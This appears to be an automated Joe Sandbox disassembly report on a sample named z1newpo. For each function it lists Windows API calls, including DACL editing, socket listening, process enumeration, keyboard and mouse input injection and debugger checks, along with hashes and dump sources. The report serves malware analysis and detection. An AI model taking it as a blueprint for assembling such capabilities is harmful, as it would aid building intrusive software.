                                                    • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                    • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                    • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                    • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                    Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                      • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                      • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                      • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                    • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                    • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                    • CopySid.ADVAPI32(00000000), ref: 00446271
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                    • String ID:
                                                    • API String ID: 1255039815-0
                                                    • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                    • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                    • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                    • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                    Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __swprintf.LIBCMT ref: 00433073
                                                    • __swprintf.LIBCMT ref: 00433085
                                                    • __wcsicoll.LIBCMT ref: 00433092
                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                    • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                    • LockResource.KERNEL32(00000000), ref: 004330CA
                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                    • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                    • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                    • LockResource.KERNEL32(?), ref: 00433120
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                    • String ID:
                                                    • API String ID: 1158019794-0
                                                    • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                    • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                    • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                    • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                    Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                    • String ID:
                                                    • API String ID: 1737998785-0
                                                    • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                    • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                    • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                    • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                    Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                    • GetLastError.KERNEL32 ref: 0045D6BF
                                                    • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                    • API String ID: 4194297153-14809454
                                                    • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                    • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                    • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                    • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                    Function 0044EB5F Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 643COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove$_strncmp
                                                    • String ID: @oH$\$^$h
                                                    • API String ID: 2175499884-3701065813
                                                    • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                    • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                    • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                    • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                    Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                    • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                                    • String ID:
                                                    • API String ID: 540024437-0
                                                    • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                    • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                    • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                    • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                    Function 0044663B Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 895COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                    • API String ID: 0-2872873767
                                                    • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                    • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                    • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                    • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                    Function 004755C4 Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                    • __wsplitpath.LIBCMT ref: 00475644
                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                    • _wcscat.LIBCMT ref: 00475657
                                                    • __wcsicoll.LIBCMT ref: 0047567B
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                    • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                    • String ID:
                                                    • API String ID: 2547909840-0
                                                    • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                    • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                    • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                    • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                    Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                    • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                    • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                    • FindClose.KERNEL32(?), ref: 004525FF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                    • String ID: *.*$\VH
                                                    • API String ID: 2786137511-2657498754
                                                    • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                    • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                    • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                    • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                    Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                    • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                    • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                    • String ID: pqI
                                                    • API String ID: 2579439406-2459173057
                                                    • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                    • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                    • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                    • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                    Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __wcsicoll.LIBCMT ref: 00433349
                                                    • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                    • __wcsicoll.LIBCMT ref: 00433375
                                                    • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __wcsicollmouse_event
                                                    • String ID: DOWN
                                                    • API String ID: 1033544147-711622031
                                                    • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                    • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                    • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                    • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                    Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                    • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                    • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                    • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                    • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: KeyboardMessagePostState$InputSend
                                                    • String ID:
                                                    • API String ID: 3031425849-0
                                                    • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                    • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                    • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                    • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                    Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                    • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 4170576061-0
                                                    • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                    • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                    • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                    • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                    Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                    • IsWindowVisible.USER32 ref: 0047A368
                                                    • IsWindowEnabled.USER32 ref: 0047A378
                                                    • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                    • IsIconic.USER32 ref: 0047A393
                                                    • IsZoomed.USER32 ref: 0047A3A1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
